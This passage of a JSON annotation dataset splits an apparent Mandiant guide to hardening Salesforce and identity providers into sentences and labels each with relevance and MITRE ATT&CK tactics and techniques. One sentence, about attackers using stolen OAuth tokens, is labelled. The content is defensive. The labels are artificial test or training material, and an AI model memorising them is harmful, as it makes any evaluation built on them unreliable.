domain-joined or verified as compliant with the organization's security standards.", "sentence_text": "This policy ensures that a device meets a minimum security baseline before it can access sensitive data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s50-5af07e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "This policy ensures that a device meets a minimum security baseline before it can access sensitive data.", "sentence_text": "Key device posture checks should include:\nValid host certificate:\nThe device must present a valid, company-issued certificate Approved operating system:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s51-a3e4e1", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "Key device posture checks should include:\nValid host certificate:\nThe device must present a valid, company-issued certificate Approved operating system:", "sentence_text": "Monitor and gather details about devices with Endpoint Verification Automate Response to Identity Threats This approach primarily evaluates two categories of risk:\nRisky sign-ins:\nThe probability that an authentication request is illegitimate due to factors like atypical travel, a malware-linked IP address, or password spray activity Risky users:\nThe probability that a user's credential has been compromised or leaked online Based on the detected risk level, Mandiant recommends that organizations apply a tiered approach to remediation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s52-e7b4ef", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Monitor and gather details about devices with Endpoint Verification Automate Response to Identity Threats This approach primarily evaluates two categories of risk:\nRisky sign-ins:\nThe probability that an authentication request is illegitimate due to factors like atypical travel, a malware-linked IP address, or password spray activity Risky users:\nThe probability that a user's credential has been compromised or leaked online Based on the detected risk level, Mandiant recommends that organizations apply a tiered approach to remediation.", "sentence_text": "Recommended Risk-Based Actions For high-risk events:\nOrganizations should apply the most stringent security controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s53-3e7461", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "Recommended Risk-Based Actions For high-risk events:\nOrganizations should apply the most stringent security controls.", "sentence_text": "This includes blocking access entirely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s54-0e8899", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "This includes blocking access entirely.", "sentence_text": "For medium-risk events:\nAccess should be granted only after a significant step-up in verification.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s55-db7de6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "For medium-risk events:\nAccess should be granted only after a significant step-up in verification.", "sentence_text": "This typically means requiring proof of both the user's identity (via strong MFA) and the device's integrity (by verifying its compliance and security posture).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s56-669d21", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "This typically means requiring proof of both the user's identity (via strong MFA) and the device's integrity (by verifying its compliance and security posture).", "sentence_text": "For Microsoft Entra ID:\nOverview\nConfiguration\nFor Okta:\nBehavior detection\nRisk-based policies\nFor Google Cloud Identity / Workspace:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s57-4290bd", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "For Microsoft Entra ID:\nOverview\nConfiguration\nFor Okta:\nBehavior detection\nRisk-based policies\nFor Google Cloud Identity / Workspace:", "sentence_text": "Access context manager overview:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s58-f30bb7", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "Access context manager overview:", "sentence_text": "SaaS Applications Salesforce Targeted Hardening Controls", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s59-407252", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "SaaS Applications Salesforce Targeted Hardening Controls", "sentence_text": "This section details specific security controls applicable for Salesforce instances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s60-1e6d32", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "This section details specific security controls applicable for Salesforce instances.", "sentence_text": "These controls are designed to protect against broad access, data exfiltration, and unauthorized access to sensitive data within Salesforce.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s61-ae047f", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "These controls are designed to protect against broad access, data exfiltration, and unauthorized access to sensitive data within Salesforce.", "sentence_text": "Network and Login Controls Restrict logins to only originate from trusted network locations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s62-4c150e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "Network and Login Controls Restrict logins to only originate from trusted network locations.", "sentence_text": "See\nSalesforce guidance on network access and profile-based IP restrictions Restrict Login by IP Address", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s63-da6628", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "See\nSalesforce guidance on network access and profile-based IP restrictions Restrict Login by IP Address", "sentence_text": "This control prevents credential misuse from unauthorized networks, effectively blocking access even if an attacker has stolen valid user credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s64-b29fd2", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "This control prevents credential misuse from unauthorized networks, effectively blocking access even if an attacker has stolen valid user credentials.", "sentence_text": "Define login IP ranges at the profile level to only permit access from corporate and trusted network addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s65-73e428", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Define login IP ranges at the profile level to only permit access from corporate and trusted network addresses.", "sentence_text": "In Session Settings, enable “Enforce login IP ranges on every request” to ensure the check is not bypassed by an existing session.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s66-055a2e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "In Session Settings, enable “Enforce login IP ranges on every request” to ensure the check is not bypassed by an existing session.", "sentence_text": "See\nSalesforce guidance on setting trusted IP ranges Application and API Access Governance Govern Connected App and API Access Threat actors often bypass interactive login controls by leveraging generic API clients and stolen OAuth tokens.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1550", "name": "Use Alternate Authentication Material" } ], "procedure": "Bypass interactive login controls by leveraging generic API clients and stolen OAuth tokens.", "entities": [ { "text": "bypass interactive login controls by leveraging generic API clients and stolen OAuth tokens", "start": 147, "end": 238, "label": "Action" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s67-eb7692", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "See\nSalesforce guidance on setting trusted IP ranges Application and API Access Governance Govern Connected App and API Access Threat actors often bypass interactive login controls by leveraging generic API clients and stolen OAuth tokens.", "sentence_text": "This policy flips the model from \"allow by default\" to \"deny by default,\" to ensure that only vetted applications can connect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s68-8e8737", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "This policy flips the model from \"allow by default\" to \"deny by default,\" to ensure that only vetted applications can connect.", "sentence_text": "Enable a \"Deny by Default\" API policy:\nNavigate to API Access Control and enable “For admin-approved users, limit API access to only allowed connected apps.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s69-fd2020", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "Enable a \"Deny by Default\" API policy:\nNavigate to API Access Control and enable “For admin-approved users, limit API access to only allowed connected apps.”", "sentence_text": "This blocks all unapproved clients.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s70-0b7d41", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "This blocks all unapproved clients.", "sentence_text": "Maintain a minimal application allowlist:\nExplicitly approve only essential Connected Apps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s71-c3165c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "Maintain a minimal application allowlist:\nExplicitly approve only essential Connected Apps.", "sentence_text": "Regularly review this allowlist to remove unused or unapproved applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s72-dec48e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "Regularly review this allowlist to remove unused or unapproved applications.", "sentence_text": "Enforce strict OAuth policies per app:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s73-8a0f43", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "Enforce strict OAuth policies per app:", "sentence_text": "Revoke sessions when removing apps:\nWhen revoking an app's access, ensure all active OAuth tokens and sessions associated with it are also revoked to prevent lingering access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s74-eb0c47", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "Revoke sessions when removing apps:\nWhen revoking an app's access, ensure all active OAuth tokens and sessions associated with it are also revoked to prevent lingering access.", "sentence_text": "Organizational process and policy:\nCreate policies governing application integrations with third parties.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s75-6fa1c2", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "Organizational process and policy:\nCreate policies governing application integrations with third parties.", "sentence_text": "See\nSalesforce guidance on managing API access User Privilege and Access Management Implement the Principle of Least Privilege Users should only be granted the absolute minimum permissions required to perform their job functions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s76-1a3dc9", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "See\nSalesforce guidance on managing API access User Privilege and Access Management Implement the Principle of Least Privilege Users should only be granted the absolute minimum permissions required to perform their job functions.", "sentence_text": "Use a \"Minimum Access\" profile as a baseline:\nConfigure a base profile with minimal permissions and assign it to all new users by default.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s77-07452a", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "Use a \"Minimum Access\" profile as a baseline:\nConfigure a base profile with minimal permissions and assign it to all new users by default.", "sentence_text": "Limit the assignment of \"View All\" and \"Modify All\" permissions Grant privileges via Permission Sets:\nGrant all additional access through well-defined Permission Sets based on job roles, rather than creating numerous custom profiles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s78-c5345b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "Limit the assignment of \"View All\" and \"Modify All\" permissions Grant privileges via Permission Sets:\nGrant all additional access through well-defined Permission Sets based on job roles, rather than creating numerous custom profiles.", "sentence_text": "Disable API access for non-essential users:\nThe \"API Enabled\" permission is required for tools like Data Loader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s79-a2fe84", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "Disable API access for non-essential users:\nThe \"API Enabled\" permission is required for tools like Data Loader.", "sentence_text": "Remove this permission from all user profiles and grant it only via a controlled Permission Set to a small number of justified users.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s80-596cf0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "Remove this permission from all user profiles and grant it only via a controlled Permission Set to a small number of justified users.", "sentence_text": "Hide the 'Setup' menu from non-admin users:\nFor all non-administrator profiles, remove access to the administrative \"Setup\" menu to prevent unauthorized configuration changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s81-e3c715", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Hide the 'Setup' menu from non-admin users:\nFor all non-administrator profiles, remove access to the administrative \"Setup\" menu to prevent unauthorized configuration changes.", "sentence_text": "Enforce high-assurance sessions for sensitive actions:\nConfigure session settings to require a high-assurance session for sensitive operations such as exporting reports.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s82-7d756d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "Enforce high-assurance sessions for sensitive actions:\nConfigure session settings to require a high-assurance session for sensitive operations such as exporting reports.", "sentence_text": "See\nSalesforce guidance on modifying session security settings See Salesforce guidance on requiring high-assurance session security See Salesforce guidance on \"View All\" and \"Modify All\" permissions Granular Data Access Policies Enforce \"Private\" Organization-Wide Sharing Defaults (OWD)\nSet the internal and external Organization-Wide Defaults (OWD)\n to\n \"Private\"\n for all sensitive objects.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s83-e8cab3", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "See\nSalesforce guidance on modifying session security settings See Salesforce guidance on requiring high-assurance session security See Salesforce guidance on \"View All\" and \"Modify All\" permissions Granular Data Access Policies Enforce \"Private\" Organization-Wide Sharing Defaults (OWD)\nSet the internal and external Organization-Wide Defaults (OWD)\n to\n \"Private\"\n for all sensitive objects.", "sentence_text": "Use strategic Sharing Rules or other sharing mechanisms to grant wider data access, rather than relying on broad access via the Role Hierarchy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s84-1b4d42", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "Use strategic Sharing Rules or other sharing mechanisms to grant wider data access, rather than relying on broad access via the Role Hierarchy.", "sentence_text": "Leverage Restriction Rules for Row-Level Security Restriction Rules act as a filter that is applied on top of all other sharing settings, allowing for fine-grained control over which records a user can see.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s85-76b8f3", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "Leverage Restriction Rules for Row-Level Security Restriction Rules act as a filter that is applied on top of all other sharing settings, allowing for fine-grained control over which records a user can see.", "sentence_text": "See\nSalesforce guidance on restriction rules Revoke", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s86-0f1c12", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "See\nSalesforce guidance on restriction rules Revoke", "sentence_text": "Salesforce Support Login Access Ensure that any users with access to sensitive data or with privileged access to the underlying Salesforce instance are setting strict timeouts on any Salesforce support access grants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s87-91251d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "Salesforce Support Login Access Ensure that any users with access to sensitive data or with privileged access to the underlying Salesforce instance are setting strict timeouts on any Salesforce support access grants.", "sentence_text": "Revoke any standing requests and only re-enable with strict time limits for specific use cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s88-c7bc3c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "Revoke any standing requests and only re-enable with strict time limits for specific use cases.", "sentence_text": "Be wary of enabling these grants from administrative accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s89-9392fc", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Be wary of enabling these grants from administrative accounts.", "sentence_text": "See\nSalesforce guidance on granting Salesforce Support login access Salesforce Security Health Check tool to identify and address misconfigurations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s90-90a061", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "See\nSalesforce guidance on granting Salesforce Support login access Salesforce Security Health Check tool to identify and address misconfigurations.", "sentence_text": "For additional hardening recommendations, reference the Salesforce Security Guide 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s91-19100c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "For additional hardening recommendations, reference the Salesforce Security Guide 3.", "sentence_text": "Logging and Detections Salesforce Targeted Logging and Detections Controls This section outlines key logging and detection strategies for Salesforce instances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s92-5f0297", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "Logging and Detections Salesforce Targeted Logging and Detections Controls This section outlines key logging and detection strategies for Salesforce instances.", "sentence_text": "These controls are essential for identifying and responding to advanced threats within the SaaS environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s93-bdeaf0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "These controls are essential for identifying and responding to advanced threats within the SaaS environment.", "sentence_text": "What You Need in Place Before Logging Before you turn on collection or write detections, make sure your organization is actually entitled to the logs you are planning to use - and that the right features are enabled.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s94-1c16bd", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "What You Need in Place Before Logging Before you turn on collection or write detections, make sure your organization is actually entitled to the logs you are planning to use - and that the right features are enabled.", "sentence_text": "Entitlement check (must-have)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s95-e3b863", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "Entitlement check (must-have)", "sentence_text": "Most security logs/features are gated behind Event Monitoring via Salesforce Shield or the Event Monitoring Add-On.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s96-5b6805", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Most security logs/features are gated behind Event Monitoring via Salesforce Shield or the Event Monitoring Add-On.", "sentence_text": "This applies to Real-Time Event Monitoring (RTEM) streaming and viewing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s97-5e47de", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "This applies to Real-Time Event Monitoring (RTEM) streaming and viewing.", "sentence_text": "Pick your data model per use case RTEM - Streams (near real-time alerting): Available in Enterprise/Unlimited/Developer subscriptions; streaming events retained ~3 days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s98-64b616", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "Pick your data model per use case RTEM - Streams (near real-time alerting): Available in Enterprise/Unlimited/Developer subscriptions; streaming events retained ~3 days.", "sentence_text": "RTEM - Storage: Many are Big Objects (native storage); some are standard objects (e.g. Threat Detection stores)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s99-03f922", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "RTEM - Storage: Many are Big Objects (native storage); some are standard objects (e.g. Threat Detection stores)", "sentence_text": "Event Log Files (ELF) - CSV model (batch exports): Available in Enterprise/Performance/Unlimited editions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s100-77c51d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Event Log Files (ELF) - CSV model (batch exports): Available in Enterprise/Performance/Unlimited editions.", "sentence_text": "Event Log Objects (ELO) - SOQL model (queryable history): Shield/add-on required.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s101-ccc23d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Event Log Objects (ELO) - SOQL model (queryable history): Shield/add-on required.", "sentence_text": "Turn on what you need (and scope access)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s102-debf00", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "Turn on what you need (and scope access)", "sentence_text": "Use Event Manager to enable/disable streaming and storing per event; viewing RTEM events.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s103-a4b682", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Use Event Manager to enable/disable streaming and storing per event; viewing RTEM events.", "sentence_text": "Grant access via profiles/permissions sets for RTEM and Threat Detection UI.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s104-664588", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "Grant access via profiles/permissions sets for RTEM and Threat Detection UI.", "sentence_text": "Threat Detection & ETS Threat Detection events are viewed in UI with Shield/add-on; stored in corresponding EventStore objects.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s105-350260", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "Threat Detection & ETS Threat Detection events are viewed in UI with Shield/add-on; stored in corresponding EventStore objects.", "sentence_text": "Enhanced Transaction Security (ETS) is included with RTEM for block/MFA/notify actions on real-time events.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s106-2da45e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Enhanced Transaction Security (ETS) is included with RTEM for block/MFA/notify actions on real-time events.", "sentence_text": "Login Events (LoginEventStream)\n: LoginEvent tracks the login activity of users who log in to Salesforce.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s107-8b2010", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "Login Events (LoginEventStream)\n: LoginEvent tracks the login activity of users who log in to Salesforce.", "sentence_text": "Setup Audit Trail (SetupAuditTrail)\n: Records administrative and configuration changes within your Salesforce environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s108-a1ef8d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "Setup Audit Trail (SetupAuditTrail)\n: Records administrative and configuration changes within your Salesforce environment.", "sentence_text": "API Calls (ApiEventStream)\n: Monitors API usage and potential misuse by tracking calls made by users or connected apps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s109-5b24a0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "API Calls (ApiEventStream)\n: Monitors API usage and potential misuse by tracking calls made by users or connected apps.", "sentence_text": "Report Exports (ReportEventStream)\n: Provides insights into report downloads, helping to detect potential data exfiltration attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s110-e2ada9", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Report Exports (ReportEventStream)\n: Provides insights into report downloads, helping to detect potential data exfiltration attempts.", "sentence_text": "List View Events (ListViewEventStream)\n: Tracks user interaction with list views, including access and manipulation of data within those views.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s111-440444", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "List View Events (ListViewEventStream)\n: Tracks user interaction with list views, including access and manipulation of data within those views.", "sentence_text": "Bulk API Events (BulkApiResultEvent)\n: Track when a user downloads the results of a Bulk API request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s112-d546a5", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "Bulk API Events (BulkApiResultEvent)\n: Track when a user downloads the results of a Bulk API request.", "sentence_text": "Permission Changes (PermissionSetEvent)\n: Tracks changes to permission sets and permission set groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s113-e57d0d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "Permission Changes (PermissionSetEvent)\n: Tracks changes to permission sets and permission set groups.", "sentence_text": "This event initiates when a permission is added to, or removed from a permission set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s114-e80f73", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "This event initiates when a permission is added to, or removed from a permission set.", "sentence_text": "API Anomaly (ApiAnomalyEvent)\n: Track anomalies in how users make API calls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s115-1ce70a", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "API Anomaly (ApiAnomalyEvent)\n: Track anomalies in how users make API calls.", "sentence_text": "External Identity Provider Event Logs : Track information from login attempts using SSO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s116-a7a02c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "External Identity Provider Event Logs : Track information from login attempts using SSO.", "sentence_text": "(Please follow the guidance provided by your Identity Provider for monitoring and collecting IdP event logs.)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s117-37c18c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "(Please follow the guidance provided by your Identity Provider for monitoring and collecting IdP event logs.)", "sentence_text": "These log sources will provide organizations with the logging capabilities to properly collect and monitor the common TTPs used by threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s118-ff04c6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "These log sources will provide organizations with the logging capabilities to properly collect and monitor the common TTPs used by threat actors.", "sentence_text": "The key log sources to monitor and observable Salesforce activities for each TTP are as follows:\nSaaS Applications Detections While native SIEM threat detections provide some protection, they often lack the centralized visibility needed to connect disparate events across a complex environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s119-e4b5e6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "The key log sources to monitor and observable 